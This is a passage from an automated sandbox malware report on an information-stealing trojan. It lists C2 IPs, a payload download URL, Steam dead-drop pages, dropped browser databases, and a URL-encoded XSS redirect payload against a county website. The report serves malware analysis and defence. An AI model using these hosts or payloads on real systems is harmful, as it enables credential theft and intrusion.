                                                                  https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/aspnet_regiis.exe, 00000003.00000003.1589017924.00000000031A5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		unknown
                                                                    https://steamcommunity.com/market/aspnet_regiis.exe, 00000003.00000003.1630742439.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1617024690.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1645120437.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1589017924.000000000317A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1603235018.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1659962296.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                                      		unknown
                                                                      https://store.steampowered.com/news/aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      https://community.akamai.steamstatic.com/aspnet_regiis.exe, 00000003.00000002.2579771123.000000000314A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=aspnet_regiis.exe, 00000003.00000003.1724730041.000000000326A000.00000004.00000020.00020000.00000000.sdmp, EHJKKK.3.drfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      http://store.steampowered.com/subscriber_agreement/aspnet_regiis.exe, 00000003.00000003.1630742439.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1617024690.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1645120437.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1589017924.000000000317A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1603235018.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1659962296.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgaspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                                        		unknown
                                                                        http://147.45.44.104/ldms/a43486128347.exe=----FBKFCFBFIDGCGDHJDBKFenaspnet_regiis.exe, 00000003.00000002.2578673442.0000000000563000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                          		unknown
                                                                          https://49.12.197.9/esaspnet_regiis.exe, 00000003.00000003.1725774113.00000000031E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		unknown
                                                                            https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            https://recaptcha.net/recaptcha/;aspnet_regiis.exe, 00000003.00000002.2579771123.000000000314A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=enaspnet_regiis.exe, 00000003.00000003.1630742439.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1617024690.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1645120437.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1603235018.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1659962296.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            https://steamcommunity.com/profiles/76561199780418869/inventory/aspnet_regiis.exe, 00000003.00000003.1630742439.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1617024690.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1645120437.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1589017924.000000000317A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1603235018.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1659962296.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                                              		unknown
                                                                              https://steamcommunity.com/discussions/aspnet_regiis.exe, 00000003.00000003.1630742439.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1617024690.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1645120437.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1589017924.000000000317A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1603235018.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1659962296.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                                                		unknown
                                                                                https://49.12.197.9//Hnaspnet_regiis.exe, 00000003.00000003.1630742439.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1617024690.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1645120437.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1659962296.00000000031A5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		unknown

                                                                                  World Map of Contacted IPs

                                                                                  • No. of IPs < 25%
                                                                                  • 25% < No. of IPs < 50%
                                                                                  • 50% < No. of IPs < 75%
                                                                                  • 75% < No. of IPs

                                                                                  Public IPs

                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                  49.12.197.9
                                                                                  		unknownGermany
                                                                                  		24940HETZNER-ASDEtrue
                                                                                  104.102.49.254
                                                                                  		steamcommunity.comUnited States
                                                                                  		16625AKAMAI-ASUStrue
                                                                                  147.45.44.104
                                                                                  		unknownRussian Federation
                                                                                  		2895FREE-NET-ASFREEnetEUfalse

                                                                                  General Information

                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                  Analysis ID:1524652
                                                                                  Start date and time:2024-10-03 03:25:12 +02:00
                                                                                  Joe Sandbox product:CloudBasic
                                                                                  Overall analysis duration:0h 8m 20s
                                                                                  Hypervisor based Inspection enabled:false
                                                                                  Report type:full
                                                                                  Cookbook file name:default.jbs
                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                  Number of analysed new started processes analysed:11
                                                                                  Number of new started drivers analysed:0
                                                                                  Number of existing processes analysed:0
                                                                                  Number of existing drivers analysed:0
                                                                                  Number of injected processes analysed:0
                                                                                  Technologies:
                                                                                  • HCA enabled
                                                                                  • EGA enabled
                                                                                  • AMSI enabled
                                                                                  Analysis Mode:default
                                                                                  Analysis stop reason:Timeout
                                                                                  Sample name:file.exe
                                                                                  Detection:MAL
                                                                                  Classification:mal100.troj.spyw.evad.winEXE@5/26@1/3
                                                                                  EGA Information:
                                                                                  • Successful, ratio: 100%
                                                                                  HCA Information:
                                                                                  • Successful, ratio: 100%
                                                                                  • Number of executed functions: 96
                                                                                  • Number of non-executed functions: 161
                                                                                  Cookbook Comments:
                                                                                  • Found application associated with file extension: .exe

                                                                                  Warnings

                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                  • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                  • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                  Simulations

                                                                                  Behavior and APIs

                                                                                  TimeTypeDescription
                                                                                  21:26:49API Interceptor1x Sleep call for process: aspnet_regiis.exe modified

                                                                                  Joe Sandbox View / Context

                                                                                  IPs

                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  49.12.197.966fb252fe232b_Patksl.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                    file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                      file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                        file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                          file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                            file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                              file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                  6JA2YPtbeB.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                    hTR7xY0d0V.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                      104.102.49.254http://gtm-cn-j4g3qqvf603.steamproxy1.com/Get hashmaliciousUnknownBrowse
                                                                                                      • www.valvesoftware.com/legal.htm
                                                                                                      147.45.44.104nJohIBtNm5.exeGet hashmaliciousLummaC, Amadey, Clipboard Hijacker, CryptOne, Cryptbot, LummaC Stealer, RedLineBrowse
                                                                                                      • 147.45.44.104/revada/66fa80c468fe3_Channel2.exe
                                                                                                      66fb252fe232b_Patksl.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                      • 147.45.44.104/ldms/66fbfcc9963ca_ldfsna.exe
                                                                                                      file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                      • 147.45.44.104/ldms/66fbfcc9963ca_ldfsna.exe
                                                                                                      file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                      • 147.45.44.104/ldms/66fbfcc9963ca_ldfsna.exe
                                                                                                      file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                      • 147.45.44.104/ldms/66fbfcc9963ca_ldfsna.exe
                                                                                                      file.exeGet hashmaliciousRDPWrap ToolBrowse
                                                                                                      • 147.45.44.104/prog/66f55533ca7d6_RDPWInst.exe
                                                                                                      file.exeGet hashmaliciousRDPWrap ToolBrowse
                                                                                                      • 147.45.44.104/prog/66f55533ca7d6_RDPWInst.exe
                                                                                                      file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                      • 147.45.44.104/ldms/66fbfcc9963ca_ldfsna.exe
                                                                                                      file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                      • 147.45.44.104/ldms/66fbfcc9963ca_ldfsna.exe
                                                                                                      file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                      • 147.45.44.104/ldms/66fbfcc9963ca_ldfsna.exe

                                                                                                      Domains

                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      steamcommunity.comtcU5sAPsAc.exeGet hashmaliciousRedLineBrowse
                                                                                                      • 104.102.49.254
                                                                                                      Setup.exeGet hashmaliciousLummaC, MicroClipBrowse
                                                                                                      • 104.102.49.254
                                                                                                      66fb252fe232b_Patksl.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                      • 104.102.49.254
                                                                                                      file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                      • 104.102.49.254
                                                                                                      kuly.exeGet hashmaliciousLummaCBrowse
                                                                                                      • 104.102.49.254
                                                                                                      webNY0O9Sr.exeGet hashmaliciousLummaCBrowse
                                                                                                      • 104.102.49.254
                                                                                                      klFMCT64RF.exeGet hashmaliciousLummaCBrowse
                                                                                                      • 104.102.49.254
                                                                                                      EKAHephXb2.exeGet hashmaliciousLummaC, Go Injector, LummaC StealerBrowse
                                                                                                      • 104.102.49.254
                                                                                                      webNY0O9Sr.exeGet hashmaliciousLummaCBrowse
                                                                                                      • 104.102.49.254
                                                                                                      klFMCT64RF.exeGet hashmaliciousLummaCBrowse
                                                                                                      • 104.102.49.254

                                                                                                      ASNs

                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      FREE-NET-ASFREEnetEUnJohIBtNm5.exeGet hashmaliciousLummaC, Amadey, Clipboard Hijacker, CryptOne, Cryptbot, LummaC Stealer, RedLineBrowse
                                                                                                      • 147.45.60.44
                                                                                                      66fb252fe232b_Patksl.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                      • 147.45.44.104
                                                                                                      file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                      • 147.45.44.104
                                                                                                      file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                      • 147.45.44.104
                                                                                                      file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                      • 147.45.44.104
                                                                                                      file.exeGet hashmaliciousRDPWrap ToolBrowse
                                                                                                      • 147.45.44.104
                                                                                                      file.exeGet hashmaliciousRDPWrap ToolBrowse
                                                                                                      • 147.45.44.104
                                                                                                      file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                      • 147.45.44.104
                                                                                                      file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                      • 147.45.44.104
                                                                                                      file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                      • 147.45.44.104
                                                                                                      AKAMAI-ASUSGlobalfoundries.com_Report_46279.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                                      • 23.217.172.185
                                                                                                      cleu.cmDGet hashmaliciousUnknownBrowse
                                                                                                      • 23.47.168.24
                                                                                                      kUiqbpzmbo.exeGet hashmaliciousXWormBrowse
                                                                                                      • 92.122.18.57
                                                                                                      Play_VM-NowCWhiteAudiowav012.htmlGet hashmaliciousTycoon2FABrowse
                                                                                                      • 2.19.224.93
                                                                                                      tcU5sAPsAc.exeGet hashmaliciousRedLineBrowse
                                                                                                      • 104.102.49.254
                                                                                                      deveba=.htmlGet hashmaliciousUnknownBrowse
                                                                                                      • 173.223.116.167
                                                                                                      Proposal From Transom.pdfGet hashmaliciousHtmlDropperBrowse
                                                                                                      • 23.203.104.175
                                                                                                      Payout_receipt.pdfGet hashmaliciousUnknownBrowse
                                                                                                      • 96.17.64.189
                                                                                                      Visix Digital Signage.pdfGet hashmaliciousUnknownBrowse
                                                                                                      • 23.203.104.175
                                                                                                      novo.arm7.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                      • 184.28.163.53
                                                                                                      HETZNER-ASDEMZs41xJfcH.exeGet hashmaliciousPureLog Stealer, Quasar, zgRATBrowse
                                                                                                      • 195.201.57.90
                                                                                                      N5mRSBWm8P.exeGet hashmaliciousQuasarBrowse
                                                                                                      • 195.201.57.90
                                                                                                      https://www.florenceco.org/offices/elected/solicitor/docket.php?area=florence%22%3E%3C%69%6D%67%20%73%72%63%3D%22%69%6D%61%67%65%2E%6A%70%67%22%20%6F%6E%65%72%72%6F%72%3D%22%76%61%72%20%75%72%6C%31%20%3D%20%5B%27%68%74%74%27%2C%27%70%3A%2F%2F%67%27%2C%27%6F%27%2C%27%6F%67%27%2C%27%6C%65%2E%63%27%2C%27%6F%6D%27%2C%27%2F%27%2C%27%23%27%2C%27%66%27%5D%2E%6A%6F%69%6E%28%27%27%29%3B%20%76%61%72%20%75%72%6C%32%20%3D%20%5B%27%68%74%74%27%2C%27%70%3A%2F%2F%67%27%2C%27%6F%27%2C%27%6F%67%27%2C%27%6C%65%2E%63%27%2C%27%6F%6D%27%2C%27%2F%27%2C%27%23%27%2C%27%66%27%5D%2E%6A%6F%69%6E%28%27%27%29%3B%0D%0A%76%61%72%20%75%72%6C%20%3D%20%5B%27%68%74%27%2C%27%74%70%27%2C%27%73%3A%2F%2F%76%27%2C%27%61%75%6C%27%2C%27%74%64%6F%27%2C%27%72%65%73%2E%63%27%2C%27%6F%6D%2F%30%2F%27%2C%27%30%2F%30%2F%27%2C%27%34%33%66%66%27%2C%27%35%63%62%35%27%2C%27%63%36%27%2C%27%32%65%27%2C%27%32%66%38%64%31%27%2C%27%31%63%61%33%38%38%27%2C%27%65%34%37%35%62%36%27%2C%27%63%34%36%2F14/392-16513/1254-3178-27524%27%5D%2E%6A%6F%69%6E%28%27%27%29%3B%0D%0A%20%75%72%6C%20%3D%20%75%72%6C%2E%72%65%70%6C%61%63%65%28%2F%2C%2F%67%2C%20%27%27%29%3B%20%76%61%72%20%77%69%6E%20%3D%20%77%69%6E%64%6F%77%2E%6F%70%65%6E%28%75%72%6C%2C%20%27%5F%73%65%6C%66%27%29%3B%20%77%69%6E%2E%6F%70%65%6E%65%72%20%3D%20%6E%75%6C%6C%3B%20%77%69%6E%2E%6C%6F%63%61%74%69%6F%6E%2E%72%65%70%6C%61%63%65%28%75%72%6C%29%3B%22%3EGet hashmaliciousPhisherBrowse
                                                                                                      • 5.161.250.225
                                                                                                      mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                      • 197.242.86.248
                                                                                                      ppc.elfGet hashmaliciousMiraiBrowse
                                                                                                      • 197.242.86.252
                                                                                                      novo.mpsl.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                      • 5.75.175.36
                                                                                                      novo.x86.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                      • 116.203.33.160
                                                                                                      yakov.spc.elfGet hashmaliciousMiraiBrowse
                                                                                                      • 78.47.94.116
                                                                                                      66fb252fe232b_Patksl.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                      • 49.12.197.9
                                                                                                      file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                      • 49.12.197.9

                                                                                                      JA3 Fingerprints

                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      51c64c77e60f3980eea90869b68c58a866fb252fe232b_Patksl.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                      • 49.12.197.9
                                                                                                      file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                      • 49.12.197.9
                                                                                                      file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                      • 49.12.197.9
                                                                                                      file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                      • 49.12.197.9
                                                                                                      file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                      • 49.12.197.9
                                                                                                      file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                      • 49.12.197.9
                                                                                                      file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                      • 49.12.197.9
                                                                                                      file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                      • 49.12.197.9
                                                                                                      6JA2YPtbeB.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                      • 49.12.197.9
                                                                                                      hTR7xY0d0V.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                      • 49.12.197.9
                                                                                                      37f463bf4616ecd445d4a1937da06e19MZs41xJfcH.exeGet hashmaliciousPureLog Stealer, Quasar, zgRATBrowse
                                                                                                      • 104.102.49.254
                                                                                                      C5Nbn7P6GJ.exeGet hashmaliciousXRed, XWormBrowse
                                                                                                      • 104.102.49.254
                                                                                                      66fb252fe232b_Patksl.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                      • 104.102.49.254
                                                                                                      file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                      • 104.102.49.254
                                                                                                      lFsYXvJPWw.exeGet hashmaliciousXRedBrowse
                                                                                                      • 104.102.49.254
                                                                                                      file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                      • 104.102.49.254
                                                                                                      563299efce875400a8d9b44b96597c8e-sample (1).zipGet hashmaliciousUnknownBrowse
                                                                                                      • 104.102.49.254
                                                                                                      file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                      • 104.102.49.254
                                                                                                      PERMINTAAN ANGGARAN (Universitas IPB) ID177888#U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                                                                                                      • 104.102.49.254
                                                                                                      AMG Cargo Logistic.docxGet hashmaliciousUnknownBrowse
                                                                                                      • 104.102.49.254

                                                                                                      Dropped Files

                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      C:\ProgramData\freebl3.dllfile.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                        file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                          nJohIBtNm5.exeGet hashmaliciousLummaC, Amadey, Clipboard Hijacker, CryptOne, Cryptbot, LummaC Stealer, RedLineBrowse
                                                                                                            file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                              file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                66fb252fe232b_Patksl.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                                  file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                    file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                      file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                                        file.exeGet hashmaliciousStealc, VidarBrowse

                                                                                                                          Created / dropped Files

                                                                                                                          C:\ProgramData\DBAEHCGHII.exe

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:modified
                                                                                                                          Size (bytes):13
                                                                                                                          Entropy (8bit):2.8150724101159437
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:+MEM:+BM
                                                                                                                          MD5:AEE9784C03B80D38D3271CDE2B252B8D
                                                                                                                          SHA1:E5FD9AA24C9417E7332E6F25936AE2A6EC8F1524
                                                                                                                          SHA-256:27C2CCD962C2B8DCCB52FE3688AB236F186F7A41FD57D810478712048E9AD3F8
                                                                                                                          SHA-512:A83C2F678A77228F5C7F2FB61A723217892B8422913739D1C65CB97701C341361EEEE617E9D050A86B552DB4DD87B18CFB94443977A75A5862171346609E9472
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:Unknown error

                                                                                                                          C:\ProgramData\GIEBFHCAKFBG\BKJKEB

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                          File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):5242880
                                                                                                                          Entropy (8bit):0.03786218306281921
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:58rJQaXoMXp0VW9FxWB2IGKhNbxrO3Dpvu2HI:58r54w0VW3xWB2ohFQ3Y2
                                                                                                                          MD5:4BB4A37B8E93E9B0F5D3DF275799D45E
                                                                                                                          SHA1:E27DF7CC49B0D145140C119A99C1BBAA9ECCE8F7
                                                                                                                          SHA-256:89BC0F21671C244C40A9EA42893B508858AD6E1E26AC16F2BD507C3E8CBB3CF7
                                                                                                                          SHA-512:F2FC9067EF11DC3B719507B97C76A19B9E976D143A2FD11474B8D2A2848A706AFCA316A95FEEBA644099497A95E1C426CDAB923D5A70619018E1543FEF3182DB
                                                                                                                          Malicious:false
                                                                                                                          Reputation:moderate, very likely benign file
                                                                                                                          Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\ProgramData\GIEBFHCAKFBG\BKJKEB-shm

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):32768
                                                                                                                          Entropy (8bit):0.017262956703125623
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                          MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                          SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                          SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                          SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                          Malicious:false
                                                                                                                          Reputation:high, very likely benign file
                                                                                                                          Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\ProgramData\GIEBFHCAKFBG\CGCAKK

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):159744
                                                                                                                          Entropy (8bit):0.5394293526345721
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                                                                                                          MD5:52701A76A821CDDBC23FB25C3FCA4968
                                                                                                                          SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                                                                                                          SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                                                                                                                          SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                                                                                                          Malicious:false
                                                                                                                          Reputation:high, very likely benign file
                                                                                                                          Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\ProgramData\GIEBFHCAKFBG\EHJKKK

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):106496
                                                                                                                          Entropy (8bit):1.137181696973627
                                                                                                                          Encrypted:false
